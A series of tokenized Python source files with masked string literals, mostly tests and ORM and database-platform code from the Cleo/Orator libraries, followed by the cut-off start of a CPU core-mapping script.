'<STR_LIT>' , validator . validate ( '<STR_LIT>' ) ) <EOL> try : <EOL> validator . validate ( '<STR_LIT>' ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except ValidationError as e : <EOL> self . assertRegex ( <EOL> str ( e ) , <EOL> '<STR_LIT>' <EOL> % '<STR_LIT:U+002CU+0020>' . join ( map ( repr , [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ] ) ) <EOL> ) <EOL> class CallableTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Callable ( int ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT:foo>' <EOL> ) <EOL> class IntegerTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Integer ( ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT:foo>' <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( '<STR_LIT>' ) ) <EOL> class FloatTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Float ( ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT:foo>' <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> class RangeTestCase ( CleoTestCase ) : <EOL> def test_validate_with_includes ( self ) : <EOL> validator = Range ( <NUM_LIT:12> , <NUM_LIT> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT:11> <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT> <EOL> ) <EOL> self . assertEqual ( <NUM_LIT:15> , validator . validate ( <NUM_LIT:15> ) ) <EOL> self . assertEqual ( <NUM_LIT:12> , validator . validate ( <NUM_LIT:12> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> def test_validate_without_includes ( self ) : <EOL> validator = Range ( <NUM_LIT:12> , <NUM_LIT> , False , False ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT:11> <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT> <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT:12> <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> <NUM_LIT> <EOL> ) <EOL> self . assertEqual ( <NUM_LIT:15> , validator . validate ( <NUM_LIT:15> ) ) <EOL> def test_validate_with_invalid_type ( self ) : <EOL> validator = Range ( <NUM_LIT:12> , <NUM_LIT> , validator = Integer ( ) ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <NUM_LIT:15> , validator . validate ( <NUM_LIT:15> ) ) <EOL> def test_validate_with_type ( self ) : <EOL> validator = Range ( <NUM_LIT:12> , <NUM_LIT> , validator = Float ( ) ) <EOL> self . assertEqual ( <NUM_LIT:15> , validator . validate ( <NUM_LIT:15> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( <NUM_LIT> ) ) <EOL> self . assertEqual ( <NUM_LIT> , validator . validate ( '<STR_LIT>' ) ) <EOL> def test_validate_with_string ( self ) : <EOL> validator = Range ( '<STR_LIT:c>' , '<STR_LIT:h>' , validator = None ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT:a>' <EOL> ) <EOL> self . assertRaises ( <EOL> ValidationError , <EOL> validator . validate , <EOL> '<STR_LIT:i>' <EOL> ) <EOL> self . assertEqual ( '<STR_LIT:d>' , validator . validate ( '<STR_LIT:d>' ) ) <EOL> self . assertEqual ( '<STR_LIT:h>' , validator . validate ( '<STR_LIT:h>' ) ) <EOL> self . assertEqual ( '<STR_LIT:c>' , validator . validate ( '<STR_LIT:c>' ) ) </s>
<s> class ConnectionResolverInterface ( object ) : <EOL> def connection ( self , name = None ) : <EOL> raise NotImplementedError ( ) <EOL> def get_default_connection ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def set_default_connection ( self , name ) : <EOL> raise NotImplementedError ( ) </s>
<s> from . platform import Platform <EOL> from . keywords . postgresql_keywords import PostgreSQLKeywords <EOL> from . . table import Table <EOL> from . . column import Column <EOL> from . . identifier import Identifier <EOL> class PostgresPlatform ( Platform ) : <EOL> INTERNAL_TYPE_MAPPING = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:int>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:bool>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT:text>' , <EOL> '<STR_LIT>' : '<STR_LIT:text>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' , <EOL> '<STR_LIT:date>' : '<STR_LIT:date>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:time>' : '<STR_LIT:time>' , <EOL> '<STR_LIT>' : '<STR_LIT:time>' , <EOL> '<STR_LIT:float>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:date>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def get_list_table_columns_sql ( self , table ) : <EOL> sql = """<STR_LIT>""" % self . get_table_where_clause ( table ) <EOL> return sql <EOL> def get_list_table_indexes_sql ( self , table ) : <EOL> sql = """<STR_LIT>""" <EOL> sql = sql % self . get_table_where_clause ( table , '<STR_LIT>' , '<STR_LIT>' ) <EOL> return sql <EOL> def get_list_table_foreign_keys_sql ( self , table ) : <EOL> return '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT:(>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' + self . get_table_where_clause ( table ) + '<STR_LIT>' '<STR_LIT:)>' '<STR_LIT>' <EOL> def get_table_where_clause ( self , table , class_alias = '<STR_LIT:c>' , namespace_alias = '<STR_LIT:n>' ) : <EOL> where_clause = namespace_alias + '<STR_LIT>' <EOL> if table . find ( '<STR_LIT:.>' ) >= <NUM_LIT:0> : <EOL> split = table . split ( '<STR_LIT:.>' ) <EOL> schema , table = split [ <NUM_LIT:0> ] , split [ <NUM_LIT:1> ] <EOL> schema = "<STR_LIT>" % schema <EOL> else : <EOL> schema = '<STR_LIT>' '<STR_LIT>' <EOL> where_clause += '<STR_LIT>' % ( class_alias , table , namespace_alias , schema ) <EOL> return where_clause <EOL> def get_advanced_foreign_key_options_sql ( self , foreign_key ) : <EOL> query = '<STR_LIT>' <EOL> if foreign_key . has_option ( '<STR_LIT>' ) : <EOL> query += '<STR_LIT>' % foreign_key . get_option ( '<STR_LIT>' ) <EOL> query += super ( PostgresPlatform , self ) . get_advanced_foreign_key_options_sql ( foreign_key ) <EOL> deferrable = foreign_key . has_option ( '<STR_LIT>' ) and foreign_key . get_option ( '<STR_LIT>' ) is not False <EOL> if deferrable : <EOL> query += '<STR_LIT>' <EOL> else : <EOL> query += '<STR_LIT>' <EOL> query += '<STR_LIT>' <EOL> deferred = foreign_key . has_option ( '<STR_LIT>' ) and foreign_key . get_option ( '<STR_LIT>' ) is not False <EOL> if deferred : <EOL> query += '<STR_LIT>' <EOL> else : <EOL> query += '<STR_LIT>' <EOL> return query <EOL> def get_alter_table_sql ( self , diff ) : <EOL> """<STR_LIT>""" <EOL> sql = [ ] <EOL> for column_diff in diff . changed_columns . values ( ) : <EOL> if self . is_unchanged_binary_column ( column_diff ) : <EOL> continue <EOL> old_column_name = column_diff . get_old_column_name ( ) . get_quoted_name ( self ) <EOL> column = column_diff . column <EOL> if any ( [ column_diff . has_changed ( '<STR_LIT:type>' ) , <EOL> column_diff . has_changed ( '<STR_LIT>' ) , <EOL> column_diff . has_changed ( '<STR_LIT>' ) , <EOL> column_diff . has_changed ( '<STR_LIT>' ) ] ) : <EOL> query = '<STR_LIT>' + old_column_name + '<STR_LIT>' + self . get_sql_type_declaration ( column . to_dict ( ) ) <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> if column_diff . has_changed ( '<STR_LIT:default>' ) or column_diff . has_changed ( '<STR_LIT:type>' ) : <EOL> if column . get_default ( ) is None : <EOL> default_clause = '<STR_LIT>' <EOL> else : <EOL> default_clause = '<STR_LIT>' + self . get_default_value_declaration_sql ( column . to_dict ( ) ) <EOL> query = '<STR_LIT>' + old_column_name + default_clause <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> if column_diff . has_changed ( '<STR_LIT>' ) : <EOL> op = '<STR_LIT>' <EOL> if column . get_notnull ( ) : <EOL> op = '<STR_LIT>' <EOL> query = '<STR_LIT>' + old_column_name + '<STR_LIT:U+0020>' + op + '<STR_LIT>' <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> if column_diff . has_changed ( '<STR_LIT>' ) : <EOL> if column . get_autoincrement ( ) : <EOL> seq_name = self . get_identity_sequence_name ( diff . name , old_column_name ) <EOL> sql . append ( '<STR_LIT>' + seq_name ) <EOL> sql . append ( '<STR_LIT>' + seq_name + '<STR_LIT>' <EOL> '<STR_LIT>' + old_column_name + '<STR_LIT>' + diff . name + '<STR_LIT>' ) <EOL> query = '<STR_LIT>' + old_column_name + '<STR_LIT>' + seq_name + '<STR_LIT>' <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> else : <EOL> query = '<STR_LIT>' + old_column_name + '<STR_LIT>' <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> if column_diff . has_changed ( '<STR_LIT>' ) : <EOL> query = '<STR_LIT>' + old_column_name + '<STR_LIT>' + self . get_sql_type_declaration ( column . to_dict ( ) ) <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' + query ) <EOL> for old_column_name , column in diff . renamed_columns . items ( ) : <EOL> sql . append ( '<STR_LIT>' + diff . get_name ( self ) . get_quoted_name ( self ) + '<STR_LIT:U+0020>' <EOL> '<STR_LIT>' + Identifier ( old_column_name ) . get_quoted_name ( self ) + <EOL> '<STR_LIT>' + column . get_quoted_name ( self ) ) <EOL> return sql <EOL> def is_unchanged_binary_column ( self , column_diff ) : <EOL> column_type = column_diff . column . get_type ( ) <EOL> if column_type not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return False <EOL> if isinstance ( column_diff . from_column , Column ) : <EOL> from_column = column_diff . from_column <EOL> else : <EOL> from_column = None <EOL> if from_column : <EOL> from_column_type = self . INTERNAL_TYPE_MAPPING [ from_column . get_type ( ) ] <EOL> if from_column_type in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return False <EOL> return len ( [ x for x in column_diff . changed_properties if x not in [ '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' ] ] ) == <NUM_LIT:0> <EOL> if column_diff . has_changed ( '<STR_LIT:type>' ) : <EOL> return False <EOL> return len ( [ x for x in column_diff . changed_properties if x not in [ '<STR_LIT>' , '<STR_LIT>' ] ] ) == <NUM_LIT:0> <EOL> def convert_booleans ( self , item ) : <EOL> if isinstance ( item , list ) : <EOL> for i , value in enumerate ( item ) : <EOL> if isinstance ( value , bool ) : <EOL> item [ i ] = str ( value ) . lower ( ) <EOL> elif isinstance ( item , bool ) : <EOL> item = str ( item ) . lower ( ) <EOL> return item <EOL> def get_boolean_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_integer_type_declaration_sql ( self , column ) : <EOL> if column . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def get_bigint_type_declaration_sql ( self , column ) : <EOL> if column . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def get_smallint_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_guid_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_datetime_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_datetimetz_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_date_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_time_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_string_type_declaration_sql ( self , column ) : <EOL> length = column . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fixed = column . get ( '<STR_LIT>' ) <EOL> if fixed : <EOL> return '<STR_LIT>' % length <EOL> else : <EOL> return '<STR_LIT>' % length <EOL> def get_binary_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_blob_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_clob_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_text_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_json_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def get_decimal_type_declaration_sql ( self , column ) : <EOL> if '<STR_LIT>' not in column or not column [ '<STR_LIT>' ] : <EOL> column [ '<STR_LIT>' ] = <NUM_LIT:10> <EOL> if '<STR_LIT>' not in column or not column [ '<STR_LIT>' ] : <EOL> column [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> return '<STR_LIT>' % ( column [ '<STR_LIT>' ] , column [ '<STR_LIT>' ] ) <EOL> def get_float_type_declaration_sql ( self , column ) : <EOL> return '<STR_LIT>' <EOL> def supports_foreign_key_constraints ( self ) : <EOL> return True <EOL> def _get_reserved_keywords_class ( self ) : <EOL> return PostgreSQLKeywords </s>
<s> from ... query . expression import QueryExpression <EOL> from . relation import Relation <EOL> from . result import Result <EOL> class BelongsTo ( Relation ) : <EOL> def __init__ ( self , query , parent , foreign_key , other_key , relation ) : <EOL> """<STR_LIT>""" <EOL> self . _other_key = other_key <EOL> self . _relation = relation <EOL> self . _foreign_key = foreign_key <EOL> super ( BelongsTo , self ) . __init__ ( query , parent ) <EOL> def get_results ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _query . first ( ) <EOL> def add_constraints ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _constraints : <EOL> table = self . _related . get_table ( ) <EOL> self . _query . where ( '<STR_LIT>' % ( table , self . _other_key ) , '<STR_LIT:=>' , getattr ( self . _parent , self . _foreign_key ) ) <EOL> def get_relation_count_query ( self , query , parent ) : <EOL> """<STR_LIT>""" <EOL> query . select ( QueryExpression ( '<STR_LIT>' ) ) <EOL> other_key = self . wrap ( '<STR_LIT>' % ( query . get_model ( ) . get_table ( ) , self . _other_key ) ) <EOL> return query . where ( self . get_qualified_foreign_key ( ) , '<STR_LIT:=>' , QueryExpression ( other_key ) ) <EOL> def add_eager_constraints ( self , models ) : <EOL> """<STR_LIT>""" <EOL> key = '<STR_LIT>' % ( self . _related . get_table ( ) , self . _other_key ) <EOL> self . _query . where_in ( key , self . _get_eager_model_keys ( models ) ) <EOL> def _get_eager_model_keys ( self , models ) : <EOL> """<STR_LIT>""" <EOL> keys = [ ] <EOL> for model in models : <EOL> value = getattr ( model , self . _foreign_key ) <EOL> if value is not None and value not in keys : <EOL> keys . append ( value ) <EOL> if not len ( keys ) : <EOL> return [ <NUM_LIT:0> ] <EOL> return keys <EOL> def init_relation ( self , models , relation ) : <EOL> """<STR_LIT>""" <EOL> for model in models : <EOL> model . set_relation ( relation , Result ( None , self , model ) ) <EOL> return models <EOL> def match ( self , models , results , relation ) : <EOL> """<STR_LIT>""" <EOL> foreign = self . _foreign_key <EOL> other = self . _other_key <EOL> dictionary = { } <EOL> for result in results : <EOL> dictionary [ result . get_attribute ( other ) ] = result <EOL> for model in models : <EOL> value = getattr ( model , foreign ) <EOL> if value in dictionary : <EOL> results = Result ( dictionary [ value ] , self , model ) <EOL> else : <EOL> results = Result ( None , self , model ) <EOL> model . set_relation ( relation , results ) <EOL> return models <EOL> def associate ( self , model ) : <EOL> """<STR_LIT>""" <EOL> self . _parent . set_attribute ( self . _foreign_key , model . get_attribute ( self . _other_key ) ) <EOL> return self . _parent . set_relation ( self . _relation , Result ( model , self , self . _parent ) ) <EOL> def dissociate ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _parent . set_attribute ( self . _foreign_key , None ) <EOL> return self . _parent . set_relation ( self . _relation , Result ( None , self , self . _parent ) ) <EOL> def update ( self , _attributes = None , ** attributes ) : <EOL> """<STR_LIT>""" <EOL> if _attributes is not None : <EOL> attributes . update ( _attributes ) <EOL> instance = self . get_results ( ) <EOL> return instance . fill ( attributes ) . save ( ) <EOL> def get_foreign_key ( self ) : <EOL> return self . _foreign_key <EOL> def get_qualified_foreign_key ( self ) : <EOL> return '<STR_LIT>' % ( self . _parent . get_table ( ) , self . _foreign_key ) <EOL> def get_other_key ( self ) : <EOL> return self . _other_key <EOL> def get_qualified_other_key_name ( self ) : <EOL> return '<STR_LIT>' % ( self . _related . get_table ( ) , self . _other_key ) <EOL> def _new_instance ( self , model ) : <EOL> return BelongsTo ( <EOL> self . new_query ( ) , <EOL> model , <EOL> self . _foreign_key , <EOL> self . _other_key , <EOL> self . _relation <EOL> ) </s>
<s> from . grammar import QueryGrammar <EOL> from . postgres_grammar import PostgresQueryGrammar <EOL> from . mysql_grammar import MySQLQueryGrammar <EOL> from . sqlite_grammar import SQLiteQueryGrammar </s>
<s> from . . query . expression import QueryExpression <EOL> class Grammar ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _table_prefix = '<STR_LIT>' <EOL> def wrap_list ( self , values ) : <EOL> return map ( self . wrap , values ) <EOL> def wrap_table ( self , table ) : <EOL> if self . is_expression ( table ) : <EOL> return self . get_value ( table ) <EOL> return self . wrap ( self . _table_prefix + str ( table ) , True ) <EOL> def wrap ( self , value , prefix_alias = False ) : <EOL> if self . is_expression ( value ) : <EOL> return self . get_value ( value ) <EOL> if value . lower ( ) . find ( '<STR_LIT>' ) >= <NUM_LIT:0> : <EOL> segments = value . split ( '<STR_LIT:U+0020>' ) <EOL> if prefix_alias : <EOL> segments [ <NUM_LIT:2> ] = self . _table_prefix + segments [ <NUM_LIT:2> ] <EOL> return '<STR_LIT>' % ( self . wrap ( segments [ <NUM_LIT:0> ] ) , <EOL> self . _wrap_value ( segments [ <NUM_LIT:2> ] ) ) <EOL> wrapped = [ ] <EOL> segments = value . split ( '<STR_LIT:.>' ) <EOL> for key , segment in enumerate ( segments ) : <EOL> if key == <NUM_LIT:0> and len ( segments ) > <NUM_LIT:1> : <EOL> wrapped . append ( self . wrap_table ( segment ) ) <EOL> else : <EOL> wrapped . append ( self . _wrap_value ( segment ) ) <EOL> return '<STR_LIT:.>' . join ( wrapped ) <EOL> def _wrap_value ( self , value ) : <EOL> if value == '<STR_LIT:*>' : <EOL> return value <EOL> return '<STR_LIT>' % value . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> def columnize ( self , columns ) : <EOL> return '<STR_LIT:U+002CU+0020>' . join ( map ( self . wrap , columns ) ) <EOL> def parameterize ( self , values ) : <EOL> return '<STR_LIT:U+002CU+0020>' . join ( map ( self . parameter , values ) ) <EOL> def parameter ( self , value ) : <EOL> if self . is_expression ( value ) : <EOL> return self . get_value ( value ) <EOL> return self . get_marker ( ) <EOL> def get_value ( self , expression ) : <EOL> return expression . get_value ( ) <EOL> def is_expression ( self , value ) : <EOL> return isinstance ( value , QueryExpression ) <EOL> def get_date_format ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_table_prefix ( self ) : <EOL> return self . _table_prefix <EOL> def set_table_prefix ( self , prefix ) : <EOL> self . _table_prefix = prefix <EOL> return self <EOL> def get_marker ( self ) : <EOL> return '<STR_LIT:?>' </s>
<s> import arrow <EOL> from flexmock import flexmock , flexmock_teardown <EOL> from ... import OratorTestCase <EOL> from orator . query . builder import QueryBuilder <EOL> from orator . query . grammars import QueryGrammar <EOL> from orator . query . expression import QueryExpression <EOL> from orator . orm . builder import Builder <EOL> from orator . orm . model import Model <EOL> from orator . orm . relations import HasOne <EOL> from orator . orm . collection import Collection <EOL> class OrmHasOneTestCase ( OratorTestCase ) : <EOL> def tearDown ( self ) : <EOL> flexmock_teardown ( ) <EOL> def test_save_method_set_foreign_key_on_model ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> mock_model = flexmock ( Model ( ) , save = lambda : True ) <EOL> mock_model . should_receive ( '<STR_LIT>' ) . once ( ) . and_return ( True ) <EOL> result = relation . save ( mock_model ) <EOL> attributes = result . get_attributes ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , attributes [ '<STR_LIT>' ] ) <EOL> def test_create_properly_creates_new_model ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> created = flexmock ( Model ( ) , save = lambda : True , set_attribute = lambda : None ) <EOL> created . should_receive ( '<STR_LIT>' ) . once ( ) . and_return ( True ) <EOL> relation . get_related ( ) . should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( { '<STR_LIT:name>' : '<STR_LIT>' } ) . and_return ( created ) <EOL> created . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( created , relation . create ( name = '<STR_LIT>' ) ) <EOL> def test_update_updates_models_with_timestamps ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> relation . get_related ( ) . should_receive ( '<STR_LIT>' ) . once ( ) . and_return ( True ) <EOL> now = arrow . get ( ) <EOL> relation . get_related ( ) . should_receive ( '<STR_LIT>' ) . once ( ) . and_return ( now ) <EOL> relation . get_query ( ) . should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT>' : now } ) . and_return ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , relation . update ( foo = '<STR_LIT:bar>' ) ) <EOL> def test_relation_is_properly_initialized ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> model = flexmock ( Model ( ) ) <EOL> model . should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( '<STR_LIT:foo>' , None ) <EOL> models = relation . init_relation ( [ model ] , '<STR_LIT:foo>' ) <EOL> self . assertEqual ( [ model ] , models ) <EOL> def test_eager_constraints_are_properly_added ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> relation . get_query ( ) . get_query ( ) . should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( '<STR_LIT>' , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> model1 = OrmHasOneModelStub ( ) <EOL> model1 . id = <NUM_LIT:1> <EOL> model2 = OrmHasOneModelStub ( ) <EOL> model2 . id = <NUM_LIT:2> <EOL> relation . add_eager_constraints ( [ model1 , model2 ] ) <EOL> def test_models_are_properly_matched_to_parents ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> result1 = OrmHasOneModelStub ( ) <EOL> result1 . foreign_key = <NUM_LIT:1> <EOL> result2 = OrmHasOneModelStub ( ) <EOL> result2 . foreign_key = <NUM_LIT:2> <EOL> model1 = OrmHasOneModelStub ( ) <EOL> model1 . id = <NUM_LIT:1> <EOL> model2 = OrmHasOneModelStub ( ) <EOL> model2 . id = <NUM_LIT:2> <EOL> model3 = OrmHasOneModelStub ( ) <EOL> model3 . id = <NUM_LIT:3> <EOL> relation . get_query ( ) . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT>' , '<STR_LIT:=>' , <NUM_LIT:2> ) <EOL> relation . get_query ( ) . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT>' , '<STR_LIT:=>' , <NUM_LIT:3> ) <EOL> models = relation . match ( [ model1 , model2 , model3 ] , Collection ( [ result1 , result2 ] ) , '<STR_LIT:foo>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , models [ <NUM_LIT:0> ] . foo . foreign_key ) <EOL> self . assertEqual ( <NUM_LIT:2> , models [ <NUM_LIT:1> ] . foo . foreign_key ) <EOL> self . assertEqual ( None , models [ <NUM_LIT:2> ] . foo ) <EOL> def test_relation_count_query_can_be_built ( self ) : <EOL> relation = self . _get_relation ( ) <EOL> query = flexmock ( QueryBuilder ( None , QueryGrammar ( ) , None ) ) <EOL> builder = Builder ( query ) <EOL> builder . get_query ( ) . should_receive ( '<STR_LIT>' ) . once ( ) <EOL> relation . get_parent ( ) . should_receive ( '<STR_LIT>' ) . and_return ( '<STR_LIT>' ) <EOL> builder . should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( '<STR_LIT>' , '<STR_LIT:=>' , QueryExpression ) <EOL> parent_query = flexmock ( QueryBuilder ( None , None , None ) ) <EOL> relation . get_query ( ) . should_receive ( '<STR_LIT>' ) . and_return ( parent_query ) <EOL> grammar = flexmock ( ) <EOL> parent_query . should_receive ( '<STR_LIT>' ) . once ( ) . and_return ( grammar ) <EOL> grammar . should_receive ( '<STR_LIT>' ) . once ( ) . with_args ( '<STR_LIT>' ) <EOL> relation . get_relation_count_query ( builder , builder ) <EOL> def _get_relation ( self ) : <EOL> flexmock ( Builder ) <EOL> query = flexmock ( QueryBuilder ( None , QueryGrammar ( ) , None ) ) <EOL> builder = Builder ( query ) <EOL> builder . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT>' , '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> related = flexmock ( Model ( ) ) <EOL> related_query = QueryBuilder ( None , QueryGrammar ( ) , None ) <EOL> related . should_receive ( '<STR_LIT>' ) . and_return ( Builder ( related_query ) ) <EOL> builder . should_receive ( '<STR_LIT>' ) . and_return ( related ) <EOL> parent = flexmock ( Model ( ) ) <EOL> parent . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT:id>' ) . and_return ( <NUM_LIT:1> ) <EOL> parent . should_receive ( '<STR_LIT>' ) . and_return ( '<STR_LIT>' ) <EOL> parent . should_receive ( '<STR_LIT>' ) . and_return ( '<STR_LIT>' ) <EOL> parent . should_receive ( '<STR_LIT>' ) . and_return ( builder ) <EOL> return HasOne ( builder , parent , '<STR_LIT>' , '<STR_LIT:id>' ) <EOL> class OrmHasOneModelStub ( Model ) : <EOL> pass </s>
<s> import sys <EOL> import argparse <EOL> ONVM_CONST_MGR_THRD = <NUM_LIT:3> <EOL> sockets = [ ] <EOL> cores = [ ] <EOL> core_map = { } <EOL> onvm_mgr_corelist = [ ] <EOL> onvm_nfs_corelist = [ ] <EOL> """<STR_LIT>""" <EOL> def dpdk_cpu_info ( ) : <EOL> global core_map <EOL> global cores <EOL> global core_map <EOL> fd = open ( "<STR_LIT>" ) <EOL> lines = fd . readlines ( ) <EOL> fd . close ( ) <EOL> core_details = [ ] <EOL> core_lines = { } <EOL> for line in lines : <EOL> if len ( line . strip ( ) ) != <NUM_LIT:0> : <EOL> name , value = line . split ( "<STR_LIT::>" , <NUM_LIT:1> ) <EOL> core_lines [ name . strip ( ) ] = value . strip ( ) <EOL> else : <EOL> core_details . append ( core_lines ) <EOL> core_lines = { } <EOL> for core in core_details : <EOL> for field in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if field not in core : <EOL> print "<STR_LIT>" % field <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> core [ field ] = int ( 